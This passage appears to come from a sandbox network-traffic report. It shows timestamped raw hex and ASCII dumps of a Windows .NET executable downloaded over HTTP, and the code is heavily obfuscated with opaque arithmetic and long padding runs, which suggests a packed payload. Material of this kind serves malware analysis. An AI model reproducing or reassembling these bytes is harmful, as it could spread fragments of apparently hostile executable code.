                                2022-08-05 09:41:36 UTC10INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 4d e5 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 22 01 00 00 30 00 00 00 00 00 00 5e 41 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELMb!"0^A `@ `
                                2022-08-05 09:41:36 UTC11INData Raw: ff 11 08 20 01 00 00 00 94 58 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 03 00 00 00 20 d2 01 00 00 11 08 20 02 00 00 00 94 59 11 08 20 01 00 00 00 94 58 11 08 20 00 00 00 00 94 59 9e 00 fe 0c 17 00 11 08 20 03 00 00 00 94 5b fe 0e 16 00 fe 0c 16 00 20 6c f5 1c 00 59 38 b6 fe ff ff 7e 2b 00 00 04 fe 0d 07 00 28 7d 00 00 0a fe 0c 07 00 6f 7e 00 00 0a fe 0c 09 00 fe 0e 2a 00 20 05 00 00 00 8d 59 00 00 01 13 08 11 08 20 00 00 00 00 20 30 01 00 00 9e 00 11 08 20 01 00 00 00 20 43 02 00 00 11 08 20 00 00 00 00 94 59 9e 00 11 08 20 02 00 00 00 20 37 03 00 00 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 59 9e 00 11 08 20 03 00 00 00 20 d0 00 00 00 11 08 20 02 00 00 00 94 58 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 04 00 00 00 20
                                Data Ascii: X X Y X Y [ lY8~+(}o~* Y 0 C Y 7 Y Y X Y X
                                2022-08-05 09:41:36 UTC13INData Raw: 0c 09 00 fe 0e 1f 00 20 03 00 00 00 8d 59 00 00 01 13 08 11 08 20 00 00 00 00 20 d9 00 00 00 9e 00 11 08 20 01 00 00 00 20 57 01 00 00 11 08 20 00 00 00 00 94 59 9e 00 11 08 20 02 00 00 00 20 04 02 00 00 11 08 20 01 00 00 00 94 58 11 08 20 00 00 00 00 94 59 9e 00 fe 0c 1f 00 11 08 20 02 00 00 00 94 5b fe 0e 1e 00 fe 0c 1e 00 20 8f 89 0c 00 59 38 43 f9 ff ff fe 0c 09 00 20 71 07 00 00 5b fe 0e 20 00 fe 0c 20 00 20 ee cb 02 00 59 38 26 f9 ff ff fe 0c 00 00 fe 09 00 00 6f 82 00 00 0a fe 0e 01 00 fe 0c 09 00 fe 0e 0d 00 20 04 00 00 00 8d 59 00 00 01 13 08 11 08 20 00 00 00 00 20 fc 00 00 00 9e 00 11 08 20 01 00 00 00 20 f3 ff ff ff 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 02 00 00 00 20 c0 01 00 00 11 08 20 01 00 00 00 94 58 11 08 20 00 00 00 00 94 59 9e 00
                                Data Ascii: Y W Y X Y [ Y8C q[ Y8&o Y X X Y
                                2022-08-05 09:41:36 UTC14INData Raw: 08 20 00 00 00 00 94 59 9e 00 11 08 20 04 00 00 00 20 5f 06 00 00 11 08 20 03 00 00 00 94 59 11 08 20 02 00 00 00 94 59 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 59 9e 00 fe 0c 2c 00 11 08 20 04 00 00 00 94 5b fe 0e 2b 00 fe 0c 2b 00 20 54 30 0d 00 59 38 06 f4 ff ff 00 fe 0c 09 00 fe 0e 2e 00 20 05 00 00 00 8d 59 00 00 01 13 08 11 08 20 00 00 00 00 20 7b 01 00 00 9e 00 11 08 20 01 00 00 00 20 ea fe ff ff 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 02 00 00 00 20 0d 00 00 00 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 58 9e 00 11 08 20 03 00 00 00 20 32 04 00 00 11 08 20 02 00 00 00 94 59 11 08 20 01 00 00 00 94 59 11 08 20 00 00 00 00 94 59 9e 00 11 08 20 04 00 00 00 20 bb 00 00 00 11 08 20 03 00 00 00 94 59 11 08 20 02 00 00 00 94 58 11 08
                                Data Ascii: Y _ Y Y Y Y, [++ T0Y8. Y { X Y X 2 Y Y Y Y X
                                2022-08-05 09:41:36 UTC15INData Raw: 00 00 8b 4b 00 00 a8 4b 00 00 cf 4b 00 00 7e 4c 00 00 9e 01 00 00 46 4d 00 00 52 4e 00 00 6a 4e 00 00 95 4e 00 00 b2 0d 00 00 7c 4f 00 00 87 4f 00 00 0e 50 00 00 26 50 00 00 cb 50 00 00 ca 51 00 00 c1 18 00 00 2f 24 00 00 81 43 00 00 d8 35 00 00 6e 2c 00 00 ae 4a 00 00 d0 1e 00 00 ed 0b 00 00 d1 3d 00 00 d7 0a 00 00 6b 19 00 00 3f 00 00 00 18 49 00 00 dd 26 00 00 b2 10 00 00 86 3a 00 00 ea 1a 00 00 76 4a 00 00 e2 20 00 00 19 2f 00 00 24 15 00 00 99 3d 00 00 b7 4b 00 00 00 29 00 00 5f 24 00 00 03 0b 00 00 07 31 00 00 70 4d 00 00 ab 3e 00 00 b7 0e 00 00 13 06 00 00 a4 2a 00 00 5f 4f 00 00 fa 1b 00 00 3e 33 00 00 ac 41 00 00 31 2f 00 00 2c 0e 00 00 a3 02 00 00 38 c5 51 00 00 fe 0c 42 00 20 83 05 00 00 5b fe 0e a5 00 fe 0c a5 00 20 77 3d df 8d 59 38 a8 fc ff
                                Data Ascii: KKK~LFMRNjNN|OOP&PPQ/$C5n,J=k?I&:vJ /$=K)_$1pM>*_O>3A1/,8QB [ w=Y8
                                2022-08-05 09:41:36 UTC17INData Raw: 01 13 41 11 41 20 00 00 00 00 20 66 00 00 00 9e 00 11 41 20 01 00 00 00 20 15 01 00 00 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 d6 02 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 5a fe ff ff 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 04 00 00 00 20 49 ff ff ff 11 41 20 03 00 00 00 94 58 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 9d 00 11 41 20 04 00 00 00 94 5b fe 0e 9c 00 fe 0c 9c 00 20 2a 5a 16 8e 59 38 8c f7 ff ff 00 fe 0c 42 00 fe 0e 46 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 40 01 00 00 9e 00 11 41 20 01 00 00 00 20 d2 01 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41
                                Data Ascii: AA fA A XA A YA YA ZA XA XA XA IA XA YA XA XA [ *ZY8BF YAA @A A YA
                                2022-08-05 09:41:36 UTC18INData Raw: 8f 00 00 0a fe 0c 42 00 fe 0e db 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 b4 01 00 00 9e 00 11 41 20 01 00 00 00 20 dd 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 bb 04 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 78 05 00 00 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 04 00 00 00 20 02 04 00 00 11 41 20 03 00 00 00 94 59 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 fe 0c db 00 11 41 20 04 00 00 00 94 5b fe 0e da 00 fe 0c da 00 20 61 76 01 8e 59 38 1e f2 ff ff fe 0c 33 00 39 0b 00 00 00 20 13 2f 23 72 25 38 06 00 00 00 20 4b 2f 23 72 25 26 fe 0c 42 00 20 54 06 00 00 5b 61 38
                                Data Ascii: B YAA A A YA A YA YA xA YA YA YA A YA YA YA XA [ avY839 /#r%8 K/#r%&B T[a8
                                2022-08-05 09:41:36 UTC19INData Raw: 01 00 00 00 20 49 03 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 cc 00 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00 20 d2 fd ff ff 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 79 00 11 41 20 03 00 00 00 94 5b fe 0e 78 00 fe 0c 78 00 20 c7 9c 04 8e 59 38 20 ed ff ff 7e 2a 00 00 04 6f 8b 00 00 0a fe 0e 03 00 fe 0c 42 00 fe 0e 4e 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 97 00 00 00 9e 00 11 41 20 01 00 00 00 20 0f 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 e7 01 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00 20 af ff ff ff 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00
                                Data Ascii: IA YA A YA XA A XA XA XyA [xx Y8 ~*oBN YAA A A YA A YA XA A XA
                                2022-08-05 09:41:36 UTC21INData Raw: 59 9e 00 11 41 20 02 00 00 00 20 c1 00 00 00 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 88 01 00 00 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 04 00 00 00 20 d9 02 00 00 11 41 20 03 00 00 00 94 59 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 85 00 11 41 20 04 00 00 00 94 5b fe 0e 84 00 fe 0c 84 00 20 20 bb 1a 8e 59 38 a6 e7 ff ff 00 fe 0c 42 00 fe 0e 87 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 83 01 00 00 9e 00 11 41 20 01 00 00 00 20 eb 01 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 37 ff ff ff 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00
                                Data Ascii: YA A XA YA A YA YA XA A YA YA YA XA [ Y8B YAA A A YA 7A XA XA
                                2022-08-05 09:41:36 UTC22INData Raw: 00 00 94 5b fe 0e 53 00 fe 0c 53 00 20 38 b7 06 8e 59 38 d4 e2 ff ff fe 0c 1e 00 45 06 00 00 00 bf 00 00 00 f0 00 00 00 cb 01 00 00 cb 06 00 00 d0 07 00 00 08 09 00 00 fe 0c 42 00 fe 0e 92 00 20 04 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 95 01 00 00 9e 00 11 41 20 01 00 00 00 20 02 ff ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 3f fe ff ff 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00 20 6a ff ff ff 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 92 00 11 41 20 03 00 00 00 94 5b fe 0e 91 00 fe 0c 91 00 20 84 a9 24 8e 59 38 11 e2 ff ff fe 0c 42 00 20 55 07 00 00 5b fe 0e 93 00 fe 0c 93 00 20 0d 9b da 8d 59 38 f4 e1 ff ff fe 0c 0d 00 6f 9b 00 00
                                Data Ascii: [SS 8Y8EB YAA A A XA ?A XA XA jA YA XA XA [ $Y8B U[ Y8o
                                2022-08-05 09:41:36 UTC23INData Raw: 41 20 01 00 00 00 20 b4 ff ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 4d 00 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 fe 0c a2 00 11 41 20 02 00 00 00 94 5b fe 0e a1 00 fe 0c a1 00 20 66 b9 78 8e 59 38 3c dd ff ff 00 fe 0c 42 00 fe 0e a4 00 20 04 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 48 01 00 00 9e 00 11 41 20 01 00 00 00 20 9f 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 75 03 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 b3 fe ff ff 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c a4 00 11 41 20 03 00 00 00 94 5b fe 0e a3 00 fe 0c a3 00 20 47 fc a0 8e 59 38 99 dc ff ff fe 0c 05 00 8e 69
                                Data Ascii: A A XA MA YA XA [ fxY8<B YAA HA A YA uA YA YA A YA XA XA [ GY8i
                                2022-08-05 09:41:36 UTC25INData Raw: 00 00 9e 00 11 41 20 01 00 00 00 20 a2 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 3e fe ff ff 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00 20 7f 01 00 00 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 59 9e 00 fe 0c 5e 00 11 41 20 03 00 00 00 94 5b fe 0e 5d 00 fe 0c 5d 00 20 a2 a4 29 8e 59 38 b5 d7 ff ff 7e 2a 00 00 04 6f a3 00 00 0a fe 0e 16 00 fe 0c 42 00 fe 0e b0 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 ec 00 00 00 9e 00 11 41 20 01 00 00 00 20 b3 00 00 00 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 1e 04 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 f4 00 00 00 11 41 20 02 00 00 00 94
                                Data Ascii: A A YA >A XA XA A YA XA Y^A []] )Y8~*oB YAA A A XA A YA YA A
                                2022-08-05 09:41:36 UTC26INData Raw: ff ff fe 0c 42 00 20 7b 05 00 00 5b fe 0e be 00 fe 0c be 00 20 d8 58 df 8d 59 38 c1 d2 ff ff fe 0c 0d 00 fe 0c 17 00 7e 2a 00 00 04 6f a6 00 00 0a 6f a7 00 00 0a 20 5c 6d 33 72 38 a0 d2 ff ff 00 fe 0c 42 00 fe 0e 60 00 20 03 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 f1 01 00 00 9e 00 11 41 20 01 00 00 00 20 44 ff ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 21 02 00 00 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 59 9e 00 fe 0c 60 00 11 41 20 02 00 00 00 94 5b fe 0e 5f 00 fe 0c 5f 00 20 dc 59 16 8e 59 38 26 d2 ff ff fe 0c 42 00 20 14 04 00 00 5b fe 0e c1 00 fe 0c c1 00 20 7b cd e5 8d 59 38 09 d2 ff ff fe 0c 0d 00 fe 0c 17 00 7e 2a 00 00 04 6f a8 00 00 0a 6f a9 00 00 0a 20 5e 6d 33 72 38 e8 d1 ff ff 00 fe 0c 42 00 fe 0e
                                Data Ascii: B {[ XY8~*oo \m3r8B` YAA A DA XA !A XA Y`A [__ YY8&B [ {Y8~*oo ^m3r8B
                                2022-08-05 09:41:36 UTC27INData Raw: a2 fe 0c 42 00 fe 0e 66 00 20 04 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 da 01 00 00 9e 00 11 41 20 01 00 00 00 20 eb fe ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 ea 03 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 38 03 00 00 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 59 9e 00 fe 0c 66 00 11 41 20 03 00 00 00 94 5b fe 0e 65 00 fe 0c 65 00 20 1f 83 46 8e 59 38 e4 cc ff ff fe 0c 0d 00 fe 0c 17 00 fe 0c 23 00 6f 88 00 00 0a fe 0c 42 00 fe 0e d4 00 20 03 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 62 01 00 00 9e 00 11 41 20 01 00 00 00 20 f9 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 75 fd ff ff 11 41 20 01 00 00
                                Data Ascii: Bf YAA A A XA A YA YA 8A YA XA YfA [ee FY8#oB YAA bA A YA uA
                                2022-08-05 09:41:36 UTC29INData Raw: 00 00 00 20 f7 ff ff ff 11 41 20 03 00 00 00 94 59 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c e2 00 11 41 20 04 00 00 00 94 5b fe 0e e1 00 fe 0c e1 00 20 72 e0 31 8e 59 38 e0 c7 ff ff fe 0c 28 00 14 fe 03 fe 0e 33 00 fe 0c 42 00 fe 0e e4 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 20 01 00 00 9e 00 11 41 20 01 00 00 00 20 52 ff ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 8c 02 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 48 01 00 00 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 04 00 00 00 20 c4 00 00 00 11 41 20 03 00 00 00 94 58 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00
                                Data Ascii: A YA XA XA XA [ r1Y8(3B YAA A RA XA A YA YA HA XA YA YA A XA XA
                                2022-08-05 09:41:36 UTC30INData Raw: 01 13 41 11 41 20 00 00 00 00 20 7a 01 00 00 9e 00 11 41 20 01 00 00 00 20 5c 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 48 00 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00 20 98 04 00 00 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 fe 0c f1 00 11 41 20 03 00 00 00 94 5b fe 0e f0 00 fe 0c f0 00 20 aa 42 18 8e 59 38 44 c2 ff ff fe 0c 38 00 45 03 00 00 00 b6 01 00 00 1b 03 00 00 10 04 00 00 fe 0c 42 00 fe 0e f3 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 a6 01 00 00 9e 00 11 41 20 01 00 00 00 20 d5 fe ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 9c 03 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00
                                Data Ascii: AA zA \A YA HA YA XA A YA YA YA [ BY8D8EB YAA A A XA A YA Y
                                2022-08-05 09:41:36 UTC31INData Raw: 00 00 00 94 59 9e 00 fe 0c 00 01 11 41 20 03 00 00 00 94 5b fe 0e ff 00 fe 0c ff 00 20 f2 8b 60 8e 59 38 55 bd ff ff fe 0c 37 00 14 fe 03 fe 0e 3a 00 fe 0c 42 00 fe 0e 02 01 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 6b 01 00 00 9e 00 11 41 20 01 00 00 00 20 95 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 35 fe ff ff 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 03 00 00 00 20 6a 00 00 00 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 04 00 00 00 20 54 fe ff ff 11 41 20 03 00 00 00 94 59 11 41 20 02 00 00 00 94 58 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 02 01 11 41 20 04 00 00 00 94 5b fe 0e 01 01 fe 0c 01 01 20 d2 c1 55
                                Data Ascii: YA [ `Y8U7:B YAA kA A YA 5A XA XA jA XA XA YA TA YA XA XA XA [ U
                                2022-08-05 09:41:36 UTC33INData Raw: 00 00 00 20 7b 00 00 00 9e 00 11 41 20 01 00 00 00 20 10 02 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 ab 01 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 0d 01 11 41 20 02 00 00 00 94 5b fe 0e 0c 01 fe 0c 0c 01 20 21 39 82 8e 59 38 c2 b7 ff ff 00 fe 0c 42 00 fe 0e 0f 01 20 04 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 8c 01 00 00 9e 00 11 41 20 01 00 00 00 20 f7 fe ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 75 02 00 00 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 03 00 00 00 20 60 04 00 00 11 41 20 02 00 00 00 94 59 11 41 20 01 00 00 00 94 59 11 41 20 00 00 00 00 94 59 9e 00 fe 0c 0f 01 11 41 20 03 00 00 00 94 5b fe 0e 0e 01 fe 0c 0e 01 20 c7 37 02 8e 59
                                Data Ascii: {A A YA A YA XA [ !9Y8B YAA A A XA uA YA YA `A YA YA YA [ 7Y
                                2022-08-05 09:41:36 UTC34INData Raw: 00 fe 0e 1a 01 20 03 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 88 00 00 00 9e 00 11 41 20 01 00 00 00 20 c1 00 00 00 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 d3 fe ff ff 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 58 9e 00 fe 0c 1a 01 11 41 20 02 00 00 00 94 5b fe 0e 19 01 fe 0c 19 01 20 79 2d 6d 8e 59 38 54 b2 ff ff fe 0c 42 00 20 41 05 00 00 5b fe 0e 1b 01 fe 0c 1b 01 20 20 28 e0 8d 59 38 37 b2 ff ff fe 0c 0d 00 fe 0c 17 00 fe 0c 2d 00 6f ac 00 00 0a 20 1c 6d 33 72 38 1c b2 ff ff 20 00 00 00 00 fe 0e 10 00 fe 0c 42 00 fe 0e 72 00 20 05 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 98 01 00 00 9e 00 11 41 20 01 00 00 00 20 59 03 00 00 11 41 20 00 00 00 00 94 59 9e 00 11 41 20 02 00 00 00 20 d4 04 00 00 11 41 20
                                Data Ascii: YAA A A XA A XA XA [ y-mY8TB A[ (Y87-o m3r8 Br YAA A YA YA A
                                2022-08-05 09:41:36 UTC35INData Raw: 72 38 6b ad ff ff fe 0c 42 00 20 66 05 00 00 5b fe 0e 2a 01 fe 0c 2a 01 20 df a1 df 8d 59 38 4e ad ff ff 00 20 20 6d 33 72 38 43 ad ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 fe 0c 42 00 fe 0e 2c 01 20 03 00 00 00 8d 59 00 00 01 13 41 11 41 20 00 00 00 00 20 d0 01 00 00 9e 00 11 41 20 01 00 00 00 20 6c ff ff ff 11 41 20 00 00 00 00 94 58 9e 00 11 41 20 02 00 00 00 20 c1 01 00 00 11 41 20 01 00 00 00 94 58 11 41 20 00 00 00 00 94 59 9e 00 fe 0c 2c 01 11 41 20 02 00 00 00 94 5b fe 0e 2b 01 fe 0c 2b 01 20 3f 14 24 8e 59 38 bc ac ff ff fe 0c 14 00 fe 0c 03 00 fe 04 fe 0e 3f 00 20 22 6d 33 72 38 a4 ac ff ff fe 0c 3f 00 39 0b 00 00 00 20 f1 22 26 72 25 38 06 00 00 00 20 93 21 26 72 25 26 fe 0c 42 00 20 d4 04 00 00 5b 61 38 79 ac ff ff 00 fe 0c 42 00 fe 0e
                                Data Ascii: r8kB f[** Y8N m3r8C XB, YAA A lA XA A XA Y,A [++ ?$Y8? "m3r8?9 "&r%8 !&r%&B [a8yB
                                2022-08-05 09:41:36 UTC37INData Raw: 07 07 6f 0e 00 00 0a 00 00 dc 00 2a 00 00 01 10 00 00 02 00 02 00 2a 2c 00 18 00 00 00 00 13 30 02 00 12 00 00 00 18 00 00 11 00 02 03 6f 4e 00 00 0a 28 4f 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 1f 00 00 00 19 00 00 11 00 03 14 fe 01 0b 07 2c 04 14 0a 2b 10 00 02 03 28 08 00 00 0a 73 51 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 1c 00 00 00 1a 00 00 11 00 02 03 6f 52 00 00 0a 73 51 00 00 0a 0a 06 03 6f 53 00 00 0a 00 06 0b 2b 00 07 2a 13 30 04 00 58 00 00 00 1b 00 00 11 00 05 14 fe 01 7e 20 00 00 04 fe 01 0d 09 2c 41 05 75 08 00 00 01 0b 07 14 fe 01 16 fe 01 0d 09 2c 0e 02 03 04 07 28 1c 00 00 06 0a 2b 28 2b 20 00 05 75 0d 00 00 01 0c 08 14 fe 01 16 fe 01 0d 09 2c 0c 02 03 04 08 28 1b 00 00 06 0a 2b 07 00 00 00 05 0a 2b 00 06 2a 13 30 04 00 6c 00 00 00 1c
                                Data Ascii: o**,0oN(O+*0,+(sQ+*0oRsQoS+*0X~ ,Au,(+(+ u,(++*0l
                                2022-08-05 09:41:36 UTC38INData Raw: 7c 6a c4 30 20 77 a4 53 03 20 8f 71 10 94 20 94 ac 3f 36 28 5d 00 00 06 d0 09 00 00 02 28 11 00 00 0a 6f 67 00 00 0a 73 68 00 00 0a 0b 07 80 09 00 00 04 00 7e 09 00 00 04 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 21 00 00 11 00 7e 0a 00 00 04 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 22 00 00 11 00 7e 0b 00 00 04 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 23 00 00 11 00 28 25 00 00 06 0a 2b 00 06 2a 00 13 30 08 00 6c 02 00 00 01 00 00 11 7e 24 00 00 04 8d 15 00 00 01 0a 06 16 72 02 0c 00 70 20 ed f8 6a 25 20 73 09 31 17 20 bb 34 fd a6 20 e4 77 21 e4 20 f6 ec f4 70 28 5d 00 00 06 a2 00 06 17 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65
                                Data Ascii: |j0 wS q ?6(](ogsh~+*0!~+*0"~+*0#(%+*0l~$rp j% s1 4 w! p(] eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
                                2022-08-05 09:41:36 UTC39INData Raw: 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a 28 78 00 00 0a 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 28 77 00 00 0a d6 8d 23 00 00 01 0a 02 06 16 03 28 14 00 00 0a 00 06 0b 2b 00 07 2a 13 30 05 00 d5 09 00 00 05 00 00 11 00 14 0c 28 15 00 00 0a 7e 27 00 00 04 fe 01 13 08 11 08 39 ae 01 00 00 02 02 02 1f 3c 20 ff ff ff 7f 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65
                                Data Ascii: eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee(w(xeeeeeeeeeeeeeeeeeeeeee(w#(+*0(~'9< eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
